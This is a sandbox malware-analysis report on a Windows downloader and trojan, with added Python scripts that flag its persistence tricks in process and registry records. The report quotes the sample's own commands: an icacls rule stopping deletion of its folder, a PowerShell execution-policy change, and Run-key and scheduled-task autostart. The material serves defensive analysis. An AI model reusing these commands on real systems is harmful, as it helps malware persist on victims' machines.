7713cce5...c671 | Grouped Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader, Dropper, Trojan

Remarks (2/2)

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

(0x200003a): 2 tasks were rescheduled ahead of time to reveal dormant functionality.

Monitored Processes

Process Overview
ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID
#1 | 0xa78 | Analysis Target | High (Elevated) | eb54.tmp.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe" | -
#3 | 0x888 | Child Process | High (Elevated) | icacls.exe | icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee" /deny *S-1-1-0:(OI)(CI)(DE,DC) | #1
#4 | 0x50c | Created Scheduled Job | High (Elevated) | taskeng.exe | taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] | #1
#5 | 0x2c8 | Child Process | High (Elevated) | eb54.tmp.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe" --Admin IsNotAutoStart IsNotTask | #1
#6 | 0x8f0 | Child Process | High (Elevated) | updatewin1.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe" | #5
#7 | 0x570 | Child Process | High (Elevated) | updatewin2.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe" | #5
#8 | 0x6d0 | Child Process | High (Elevated) | updatewin1.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe" --Admin | #6
#9 | 0x4a4 | Child Process | High (Elevated) | updatewin.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe" | #5
#10 | 0x874 | Child Process | High (Elevated) | 5.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe" | #5
#11 | 0x86c | Child Process | High (Elevated) | powershell.exe | powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned | #8
#12 | 0x838 | Created Scheduled Job | Medium | taskeng.exe | taskeng.exe {A9833FF7-6F72-4DC6-BD4D-B3A90059795D} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1] | #5
#13 | 0x818 | Child Process | Medium | eb54.tmp.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --Task | #12
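The process tree above holds the security-relevant points of this report in one place: the sample copies itself into a GUID-named folder under AppData\Local, runs icacls to deny Everyone (SID S-1-1-0) the DE (delete) and DC (delete child) rights on that folder so the copy cannot be removed with ordinary user rights, relaunches itself with --Admin and later with --Task from the task scheduler engine, and the downloaded updatewin1.exe spawns powershell to relax the execution policy for the current user. The Python below, added here as an example and not VMRay's output or the sample's code, re-derives those observations from process-creation records. The records are constructed from the Process Overview table with the same PIDs and command lines; the rule names, the GUID-directory test and the other heuristics are the author's assumptions.

```python
"""Triage of a sandbox process tree for the persistence and self-protection
patterns visible in the Process Overview.  Added example: the records are
constructed from the report; rule names and heuristics are assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# An image path inside a GUID-named directory under AppData\Local (assumed heuristic).
GUID_DIR = re.compile(
    r"\\AppData\\Local\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)
# icacls deny spec as it appears in the report: /deny *S-1-1-0:(OI)(CI)(DE,DC)
ICACLS_DENY = re.compile(r"/deny\s+\*?([^\s:]+):((?:\([^)]*\))+)", re.I)
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}   # icacls inheritance tokens
EVERYONE = "S-1-1-0"


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str
    parent: Optional[int]   # None when the parent was not monitored


def image_path(cmdline: str) -> str:
    """First token of a Windows command line: the quoted path or the bare word."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0]


def parse_icacls_deny(cmdline: str):
    """Return (sid, inheritance_flags, rights) of the first /deny spec, or None."""
    m = ICACLS_DENY.search(cmdline)
    if not m:
        return None
    inherit, rights = [], []
    for group in re.findall(r"\(([^)]*)\)", m.group(2)):
        for tok in group.split(","):
            (inherit if tok in INHERIT_FLAGS else rights).append(tok)
    return m.group(1), inherit, rights


def ancestors(procs: List[Proc], pid: int) -> List[Proc]:
    """Parent, grandparent, ... for as long as they are in the record set."""
    by_pid = {p.pid: p for p in procs}
    chain, cur = [], by_pid[pid].parent
    while cur in by_pid:
        chain.append(by_pid[cur])
        cur = by_pid[cur].parent
    return chain


def triage(procs: List[Proc]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule, detail) findings over the records."""
    findings = []
    for p in procs:
        path = image_path(p.cmdline)
        chain = ancestors(procs, p.pid)
        name = p.image.lower()
        if GUID_DIR.search(path):
            findings.append((p.pid, "guid_appdata_dir", path))
        if name == "icacls.exe":
            spec = parse_icacls_deny(p.cmdline)
            target = re.search(r'"([^"]+)"', p.cmdline)
            # Everyone denied delete rights on the target: a self-protecting ACL.
            if spec and spec[0] == EVERYONE and {"DE", "DC"} & set(spec[2]):
                findings.append((p.pid, "acl_deny_delete_everyone",
                                 target.group(1) if target else "?"))
        if name == "powershell.exe" and "set-executionpolicy" in p.cmdline.lower():
            # Which ancestor running out of a GUID-named AppData folder asked for it?
            src = next((a for a in chain if GUID_DIR.search(image_path(a.cmdline))), None)
            if src is not None:
                findings.append((p.pid, "execpolicy_from_appdata", image_path(src.cmdline)))
        if (chain and chain[0].image.lower() == "taskeng.exe"
                and not path.lower().startswith("c:\\windows\\")):
            findings.append((p.pid, "scheduled_task_launch", path))
    return findings


# Constructed from the Process Overview table (same PIDs and command lines).
U = r"C:\Users\5p5NrGJn0jS HALPmcxz"
D1 = U + r"\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee"
D2 = U + r"\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0"


def q(path: str, *args: str) -> str:
    """Quote a path and append arguments, the way the report prints command lines."""
    return " ".join(['"' + path + '"', *args])


PROCS = [
    Proc(0xa78, "eb54.tmp.exe", q(U + r"\Desktop\EB54.tmp.exe"), None),
    Proc(0x888, "icacls.exe", "icacls " + q(D1, "/deny", "*S-1-1-0:(OI)(CI)(DE,DC)"), 0xa78),
    Proc(0x2c8, "eb54.tmp.exe", q(U + r"\Desktop\EB54.tmp.exe", "--Admin", "IsNotAutoStart", "IsNotTask"), 0xa78),
    Proc(0x8f0, "updatewin1.exe", q(D2 + r"\updatewin1.exe"), 0x2c8),
    Proc(0x570, "updatewin2.exe", q(D2 + r"\updatewin2.exe"), 0x2c8),
    Proc(0x6d0, "updatewin1.exe", q(D2 + r"\updatewin1.exe", "--Admin"), 0x8f0),
    Proc(0x4a4, "updatewin.exe", q(D2 + r"\updatewin.exe"), 0x2c8),
    Proc(0x874, "5.exe", q(D2 + r"\5.exe"), 0x2c8),
    Proc(0x86c, "powershell.exe", "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", 0x6d0),
    Proc(0x838, "taskeng.exe", "taskeng.exe {A9833FF7-6F72-4DC6-BD4D-B3A90059795D}", None),
    Proc(0x818, "eb54.tmp.exe", q(D1 + r"\EB54.tmp.exe", "--Task"), 0x838),
]

if __name__ == "__main__":
    for pid, rule, detail in triage(PROCS):
        print(f"{pid:#06x} {rule:26s} {detail}")
```

The same rules apply unchanged to process-creation records exported from an EDR; only the `PROCS` list is specific to this report. The icacls decoder deliberately parses `/deny` only, because that is what the report shows; widening `ICACLS_DENY` to `/grant` is a one-token change.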

Behavior Information - Grouped by Category

Process #1: eb54.tmp.exe
Information | Value
ID | #1
File Name | c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe
Command Line | "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe"
Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor | Start Time: 00:00:44, Reason: Analysis Target
Unmonitor | End Time: 00:01:33, Reason: Self Terminated
Monitor Duration | 00:00:49
OS Process Information
Information | Value
PID | 0xa78
Parent PID | 0x45c (c:\windows\explorer.exe)
Bitness | 32-bit
Is Created or Modified Executable | True
Integrity Level | High (Elevated)
Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs | 0xA7C, 0xABC, 0xAC4, 0xACC, 0xAD0, 0xAD4, 0xAD8, 0xAFC, 0xBFC, 0x880, 0x594
Memory Dumps
Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA
eb54.tmp.exe | 0x00400000 | 0x004D0FFF | Relevant Image | - | 32-bit | - | False | False
eb54.tmp.exe | 0x00400000 | 0x004D0FFF | Process Termination | - | 32-bit | - | True | False
Hook Information
Type | Installer | Target | Size | Information
IAT | private_0x00000000002a0000:+0x554dd | 2. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x9c22b0c
IAT | private_0x00000000002a0000:+0x554dd | 3. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:TerminateThread+0x0 now points to private_0x000000007fff0000:+0x433cf85d
IAT | private_0x00000000002a0000:+0x554dd | 4. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:WritePrivateProfileStructW+0x0 now points to private_0x000000007fff0000:+0x9115d8b
IAT | private_0x00000000002a0000:+0x554dd | 5. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x610184d
IAT | private_0x00000000002a0000:+0x554dd | 7. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0xbf97d8b
IAT | private_0x00000000002a0000:+0x554dd | 8. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x79040c45
IAT | private_0x00000000002a0000:+0x554dd | 13. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0xbf975ff
IAT | private_0x00000000002a0000:+0x554dd | 18. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0xb8074f3
IAT | private_0x00000000002a0000:+0x554dd | 19. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x78841446
IAT | private_0x00000000002a0000:+0x554dd | 20. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:lstrcpyA+0x0 now points to private_0x000000007fff0000:+0xb087208
IAT | private_0x00000000002a0000:+0x554dd | 25. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x568c02eb
IAT | private_0x00000000002a0000:+0x554dd | 26. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetDriveTypeW+0x0 now points to private_0x000000007fff0000:+0x5fd458b
IAT | private_0x00000000002a0000:+0x554dd | 27. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:DuplicateHandle+0x0 now points to private_0x000000007fff0000:+0xb2274c0
IAT | private_0x00000000002a0000:+0x554dd | 28. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x000000007fff0000:+0x4004085d
IAT | private_0x00000000002a0000:+0x554dd | 33. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x3a7be850
IAT | private_0x00000000002a0000:+0x554dd | 40. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0x4e8c02eb
IAT | private_0x00000000002a0000:+0x554dd | 41. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x519458b
IAT | private_0x00000000002a0000:+0x554dd | 42. entry of eb54.tmp.exe | 4 bytes | ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x69850fc0
IAT | private_0x00000000002a0000:+0x554dd | 47. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x7a83e850
IAT | private_0x00000000002a0000:+0x554dd | 48. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x44840001
IAT | private_0x00000000002a0000:+0x554dd | 49. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x00000000009f0000:+0x12fe90c
IAT | private_0x00000000002a0000:+0x554dd | 54. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b0f8b04
IAT | private_0x00000000002a0000:+0x554dd | 55. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x3cf8b02
IAT | private_0x00000000002a0000:+0x554dd | 64. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x6b178b04
IAT | private_0x00000000002a0000:+0x554dd | 65. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetTickCount+0x0 now points to private_0x000000007fff0000:+0x3d78b02
IAT | private_0x00000000002a0000:+0x554dd | 69. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7c76ff0c
IAT | private_0x00000000002a0000:+0x554dd | 72. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x69420c8d
IAT | private_0x00000000002a0000:+0x554dd | 75. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x315468b
IAT | private_0x00000000002a0000:+0x554dd | 78. entry of eb54.tmp.exe | 4 bytes | ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7884d68b
IAT | private_0x00000000002a0000:+0x554dd | 79. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:VirtualAlloc+0x0 now points to private_0x000000007fff0000:+0xb057208
IAT | private_0x00000000002a0000:+0x554dd | 80. entry of eb54.tmp.exe | 4 bytes | ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0xb03eb0e
IAT | private_0x00000000002a0000:+0x554dd | 84. entry of eb54.tmp.exe | 4 bytes | user32.dll:EndPaint+0x0 now points to private_0x000000007fff0000:+0xd20048d
IAT | private_0x00000000002a0000:+0x554dd | 86. entry of eb54.tmp.exe | 4 bytes | user32.dll:EnumDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0xc00ff72
IAT | private_0x00000000002a0000:+0x554dd | 87. entry of eb54.tmp.exe | 4 bytes | user32.dll:DrawTextExW+0x0 now points to private_0x000000007fff0000:+0x44841446
IAT | private_0x00000000002a0000:+0x554dd | 90. entry of eb54.tmp.exe | 4 bytes | user32.dll:SetPropA+0x0 now points to private_0x000000007fff0000:+0x568c02eb
IAT | private_0x00000000002a0000:+0x554dd | 92. entry of eb54.tmp.exe | 4 bytes | user32.dll:LoadImageA+0x0 now points to private_0x000000007fff0000:+0xb0f8b0e
IAT | private_0x00000000002a0000:+0x554dd | 93. entry of eb54.tmp.exe | 4 bytes | user32.dll:DestroyCursor+0x0 now points to private_0x000000007fff0000:+0xd541445
Dropped Files
Filename | File Size | YARA Match
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe | 442.50 KB | False
  MD5: 241f592a445513811b3bc3f104ffb2a8
  SHA1: 578c0a16e2428764c928db50738db2d843ca6c2f
  SHA256: 7713cce5768ed6d8250d01a006e26b5cfab3ff296f8c6dd8684a5142cc54c671
  SSDeep: 6144:3z2W1PSKq67m+2xgx08t3tmrFLLgjIv5+dHgSnSppJlV3/jKGKYoezUtyB:/u6sxgK8t9mrFL0jougpJL3/jKGxN9
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\geo[1].json | 465 bytes | False
  MD5: d6727470681ecc2ca56bbd0486b4fa97
  SHA1: 693756ab251ef2d82a91d94a2e5b78a9604d8bac
  SHA256: 8b37ae3083eb3bb497d0de9aa0f48e4fa2b893726e2a9787e6dad0ecd40d9613
  SSDeep: 12:YCJcjmdVQVCRbwXhCdEVQVPB8yPt0fRbIRAJdxFQVyrhmXoB2SH4:YODQVCRbwxCCQVvV0fRbI2JdxFQVyNm5
Host Behavior
COM (8)
Operation | Class | Interface | Additional Information | Success | Count
Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER | True | 1
Execute | TaskScheduler | ITaskService | method_name = Connect, server_name = 95, domain = 95, password = 4289035 | True | 1
Execute | TaskScheduler | ITaskService | method_name = GetFolder, path = \, new_interface = ITaskFolder | True | 1
Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition | True | 1
Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection | True | 1
Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger | True | 1
Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-05-14T03:23:19 | True | 1
Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection | True | 1
File (507)
Operation | Filename | Additional Information | Success | Count
Create Directory | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee | - | True | 1
Open | STD_INPUT_HANDLE | - | True | 2
Open | STD_OUTPUT_HANDLE | - | True | 2
Open | STD_ERROR_HANDLE | - | True | 2
Open | - | - | False | 498
Copy | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe | source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe | True | 1
Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe | - | False | 1
Registry (4)
Operation | Key | Additional Information | Success | Count
Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - | True | 1
Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = SysHelper, data = 0, type = REG_NONE | False | 1
Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --AutoStart, size = 214, type = REG_EXPAND_SZ | True | 1
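The two Registry rows that matter are the failed read of the SysHelper value under HKCU\...\Run (consistent with the value not existing yet) followed by its creation as REG_EXPAND_SZ, pointing at the copy in the GUID-named folder and passing --AutoStart so the copy knows it was started by the Run key. As an added example (not the page's or VMRay's code), the Python below evaluates Run values of that shape: it expands REG_EXPAND_SZ data against a constructed environment, separates the image from its arguments, and lists why a value deserves attention. The SysHelper record is taken from the table; the other two records, the environment values and the heuristics are constructed assumptions. The `data_bytes` field reproduces the report's `size = 214`, which is the UTF-16LE length of the data without its terminator.

```python
"""Evaluate HKCU Run autorun values of the shape the Registry table shows.
Added example: the SysHelper record is from the report; the other records,
the environment and the heuristics are constructed."""
import re
from typing import Dict, List

# Image inside a GUID-named directory under AppData\Local (assumed heuristic).
GUID_DIR = re.compile(
    r"\\AppData\\Local\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)
# Directories a standard user can write to (assumed list).
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Users\\Public|Temp)\\", re.I)
ENV_REF = re.compile(r"%([^%]+)%")

# Constructed environment used to expand REG_EXPAND_SZ data.
ENV = {
    "LOCALAPPDATA": r"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local",
    "ProgramFiles": r"C:\Program Files",
}


def expand(data: str, env: Dict[str, str] = ENV) -> str:
    """Expand %VAR% references the way REG_EXPAND_SZ data is expanded at logon
    (variable names are case-insensitive; unknown names are left untouched)."""
    lookup = {k.lower(): v for k, v in env.items()}
    return ENV_REF.sub(lambda m: lookup.get(m.group(1).lower(), m.group(0)), data)


def split_command(cmd: str):
    """Split a Run value into (image, args): a quoted image first, else the first token."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end > 0:
            return cmd[1:end], cmd[end + 1:].strip()
        return cmd[1:], ""
    parts = cmd.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def assess_run_value(name: str, data: str, reg_type: str, env: Dict[str, str] = ENV) -> dict:
    """Describe one Run value and list the reasons it deserves attention."""
    cmd = expand(data, env) if reg_type == "REG_EXPAND_SZ" else data
    image, args = split_command(cmd)
    reasons: List[str] = []
    if USER_WRITABLE.search(image):
        reasons.append("image under a user-writable directory")
    if GUID_DIR.search(image):
        reasons.append("image in a GUID-named AppData\\Local directory")
    return {
        "name": name, "type": reg_type, "image": image, "args": args,
        "reasons": reasons,
        # Byte length the registry stores for string data: UTF-16LE, no terminator.
        "data_bytes": len(data.encode("utf-16-le")),
    }


# Constructed records; the first is the value written in the Registry table above.
RUN_VALUES = [
    ("SysHelper",
     r'"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --AutoStart',
     "REG_EXPAND_SZ"),
    ("VendorTray", r'"C:\Program Files\Vendor\tray.exe" /minimized', "REG_SZ"),
    ("Updater", r'"%LOCALAPPDATA%\1b2c3d4e-5f60-7a8b-9c0d-e1f2a3b4c5d6\upd.exe"', "REG_EXPAND_SZ"),
]


def assess_all(values=RUN_VALUES) -> List[dict]:
    """Assess every (name, data, type) record."""
    return [assess_run_value(*v) for v in values]


if __name__ == "__main__":
    for r in assess_all():
        flag = "SUSPECT" if r["reasons"] else "ok"
        print(f'{flag:7s} {r["name"]:10s} {r["image"]} {r["args"]}  ({r["data_bytes"]} bytes)')
        for why in r["reasons"]:
            print("        -", why)
```

On a live host the records come from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` or the winreg module; the assessment itself needs nothing from the host, which is why it can run over a sandbox report like this one.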
Process (49)
Operation | Process | Additional Information | Success | Count
Create | icacls | os_pid = 0x888, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE | True | 1
Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe | show_window = SW_SHOW | True | 1
Enumerate Processes | - | - | True | 1
Open | System | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\smss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\services.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\program files (x86)\adobe\jefferson balanced qualifications.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\uninstall information\zero.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\msbuild\partial.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\windows sidebar\general_renewable_visual.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\microsoft visual studio 8\hayes-arlington-photography.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\microsoft sql server compact edition\acc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\reference assemblies\battery.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\windows sidebar\jeffrey indiana.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\windows sidebar\vendor carey nicholas.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\uninstall information\fetish_cd_education.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\internet explorer\hostel.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\microsoft office\engine.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\dvd maker\learners_textbooks.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\microsoft office\gratuitjuryreasonable.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\mozilla maintenance service\pursuit.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\uninstall information\zincshniagara.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\msbuild\losses.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\msbuild\technologies_signatures_notebooks.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Module (78)
Operation | Module | Additional Information | Success | Count
Load | kernel32.dll | base_address = 0x76c20000 | True | 3
Load | Psapi.dll | base_address = 0x75140000 | True | 1
Load | Shell32.dll | base_address = 0x75fd0000 | True | 1
